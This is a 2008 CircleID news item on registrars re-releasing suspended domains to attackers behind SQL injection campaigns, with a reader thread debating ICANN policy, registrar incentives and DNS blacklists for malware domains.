Buying or Selling IPv4 Addresses?

Watch this video to discover how ACCELR/8, a transformative trading platform developed by industry veterans Marc Lindsey and Janine Goodman, enables organizations to buy or sell IPv4 blocks as small as /20s.

Avenue4 LLCRead Message Promoted Post

Home / News I have a News Tip

Domain Registrars Releasing Suspended Domains to Attackers

Mary Landesman of ScanSafe reports: "A new outbreak of SQL attacks began on the 8th. Not that they ever really go away, but new waves replace the old ones. The attackers are using a much larger number of domains than seen in previous months. Just 11 days into June, and already 54 of these domains have been observed. Many of these are previously suspended domains that registrars have released back to the attackers. The end result, some of the domains involved in the late May and early June attacks are now active again. Thus not only newly compromised sites are foisting the malware, but any sites previously compromised that have not cleaned up their pages (and properly parameterized their SQL queries) will now once again be serving as conveyor belts for password stealing trojans. (Description of how SQL injection attacks work)"

"This is exactly illustrative of the problem that are enormous in the entire domain registration process," says Paul Ferguson. "...criminals are continually gaming the domain registration process without fear of retribution or punishment. This has got to change — these domain registration policy loopholes must be closed — before we can even to begin to have an impact on the criminal manipulation of the domain registration process."

Read full story: External Source

SHARE THIS POST

If you are pressed for time ...

... this is for you. More and more professionals are choosing to publish critical posts on CircleID from all corners of the Internet industry. If you find it hard to keep up daily, consider subscribing to our weekly digest. We will provide you a convenient summary report once a week sent directly to your inbox. It's a quick and easy read.

I make a point of reading CircleID. There is no getting around the utility of knowing what thoughtful people are thinking and saying about our industry.

Vinton Cerf, Co-designer of the TCP/IP Protocols & the Architecture of the Internet

Share your comments

Follow-Up Fergie  –  Jun 10, 2008 10:53 PM PST

I stand by my comments, and I'm glad Mary brought this to our attention.

This is especially indicative of the problems that we are fighting with regards to criminals gaming the domain registration policies. This must be corrected, or the Internet will continue to slide into a state where every domain is untrusted, every domain is suspect, and there will be no trust in the entire domain registry process system whatsoever.

We're almost there now.

ICANN needs to get a clue here — the entire process is broken. Completely.

- ferg

What do you think ICANN James Seng  –  Jun 11, 2008 7:50 AM PST

What do you think ICANN should do? Freeze these names indefinitely? The attackers could easily switch to IP without using domain names easily and still carry out the attack.

I dont see this as an ICANN issue really - it is a security problem that registry/registrar could help during an emergency or a stop-gap measure but not as a long term solution.

Re: What do you think ICANN... Fergie  –  Jun 11, 2008 10:31 AM PST

James Seng wrote:

"What do you think ICANN should do? Freeze these names indefinitely? The attackers could easily switch to IP without using domain names easily and still carry out the attack."

"I dont see this as an ICANN issue really - it is a security problem that registry/registrar could help during an emergency or a stop-gap measure but not as a long term solution."

Hi James,

While attackers could easily switch to using different domains, or the same domains with different nameservers and different IP address, or any combination different from the original configuration(s), the real issue here for me is that ICANN doesn't even have a process in place to properly assess the situation prior to taking actions such as this.

I'd be happy if ICANN (at the very least) instituted a process to make registrars perform some sort of preliminarily assessment of the possible dangers to the Internet community at-large prior to releasing domains which have previously been detected as being used for malicious or fraudulent purposes. And there are several publicly available sources which track malicious domains (e.g. malwaredomains.com)

Also, it is an exercise left for the reader to determine what measures could be taken to prevent these types of abuses from happening in the first place.

- ferg

any list, whether white or James Seng  –  Jun 11, 2008 10:41 AM PST

any list, whether white or black, is going to be politically challenging: How does one get onto that list? how do you get off the list? Who control that list? Why this list and not another list?

The time and money need to get these sorted out have to be weighted against the effectiveness of such blacklist, that is easy to work around (just use IP).

However, I think it is worthwhile to invest in a emergency process to suspend domain (via registries) or blackhole a specific IP address (via routing coordination). This have being done before last year in a botnet/virus attack. I can foresee we would need to do that again.

Re: any list, whether white or... Fergie  –  Jun 11, 2008 11:32 AM PST

I wouldn't get so wrapped up on the issue of "lists" - but let's face it, if there were ways to prevent criminals from gaming the entire Domain Registration system (and polluting the domain portion of the WHOIS database, but that's another, albeit related, issue), then we wouldn't have a need for black-hole lists, etc.

But black-hole lists, and white-lists, are both thriving. This is a statement unto itself.

The real underlying issue here is how to stop criminals from doing this in the first place…

- ferg

If you have an idea James Seng  –  Jun 11, 2008 12:15 PM PST

If you have an idea of how to prevent criminals from using DNS without affecting innocent party (false positive), I would be interested to hear it.

You have underestimate the difficulty to do a list (any list). Technically, ICANN manages only 2 list, a root zone file and a RIR IP allocation list. How difficult can that be, I wonder?

Re: If you have an idea... Fergie  –  Jun 11, 2008 12:21 PM PST

Of course, it's not an issue of "...allowing criminals to use DNS."

It is, however, an issue of allowing criminals to register domains simply to be used for malicious or fraudulent purposes.

Again, stop being obsessed with lists. Forget about about lists.

ICANN does have the authority to set policy for domain registration, the revocation of domains, etc.

- ferg

Fergie wrote:This must be corrected, The Famous Brett Watson  –  Jun 11, 2008 9:37 PM PST

Fergie wrote:

This must be corrected, or the Internet will continue to slide into a state where every domain is untrusted, every domain is suspect, and there will be no trust in the entire domain registry process system whatsoever.

What sort of "trust" exists now? There has never been any kind of vetting process for domain name registration. All you're getting is a name-to-address resolution mechanism. What's to trust? I'd argue that any "trust" is a hangover from earlier, happier days when cybercriminals were less numerous and methodical. The system was never any more trustworthy than it is now; it's just been less abused in the past.

The real underlying issue here is how to stop criminals from doing this in the first place…

I'd argue that the issue is one of damage control. If the damage is best controlled by registrars under the influence of ICANN policy, then so be it, but I have grave doubts about this approach because it entails an apparent conflict of interests. Domain name sellers maximise business by maximising the number of domains they sell. Cybercriminals who churn through domain names rapidly are, superficially at least, good for business. (In practice, not so much, thanks to stolen credit cards.) Worse, the whole process of screening re-registrations creates expensive manual overhead in a process which can otherwise be fully automated. In short, domain name sellers are economically motivated to do a really lousy job of policing the malicious use of domain names.

ICANN does have the authority to set policy for domain registration, the revocation of domains, etc.

Policy is insufficient in and of itself: it must be backed up by policy enforcement. ICANN is supremely bad at this, and policy without enforcement is worse than no policy at all. It would be charitable to say that they're doing a so-so job of keeping greedy registries under control; let's not compound the problem by asking them to control registrants as well.

ICANN was supposed to be a purely technical oversight body. It has inevitably become a political body, because there is no technical basis for deciding such things as what domain names can go in the root beyond "is it legal name syntax?" Let's push to contain their scope rather than expand it by demanding that they protect us from the evil cyberscourge. The less they do, the better.

You point to the service "malwaredomains.com". I think that independent third parties such as this are the right place to look for a solution. We don't need to take malware domains out of the DNS at large: we just need to filter them out of our view. Don't get me wrong: I fully understand that the ideal solution would be to eliminate them from the DNS completely, but I predict you'll be getting that right after we supply all the little girls with ponies, currently scheduled for Friday the fifth of Never.

In the meantime, we should adapt the tried-and-true (if less than ideal) solution of third party DNS blacklists to the DNS itself. The tool has become a mainstay of spam filtering, and it's about time we adopted it for DNS use. ISPs have been monkeying around with their customers' DNS resolution as is: they should use that ability to provide a useful service to their customers — simple NXDOMAIN responses for malware domains — instead of "leveraging" it for "monetization" purposes. Yes, this assumes a quaint kind of customer-service-oriented thinking which is rather lacking in the marketplace, but it can be used as a selling point, so there is at least some direct incentive for ISPs to do it. "Malware filtering" becomes another bullet point alongside "spam filtering".

Looking a little further ahead, malwaredomains.com (or its ilk) could become the next Spamhaus, offering not only a DNS blacklist, but also alerting hosting providers to the fact that they are hosting malware (just as Spamhaus aids ISPs who wish to avoid providing service to spammers). Responsible hosting providers would do periodic checks in the list for domains which they are hosting, and pro-actively disable sites that appear in the list. Like other blacklist operators, they would have no official authority, but have substantial impact built by a large user base which trusts them to do a good and proper job.

To post comments, please login or create an account.

Related

Topics

DNS Security

Sponsored byAfilias

IP Addressing

Sponsored byAvenue4 LLC

Mobile Internet

Sponsored byAfilias

Cybersecurity

Sponsored byVerisign

Promoted Post

Buying or Selling IPv4 Addresses?

Watch this video to discover how ACCELR/8, a transformative trading platform developed by industry veterans Marc Lindsey and Janine Goodman, enables organizations to buy or sell IPv4 blocks as small as /20s.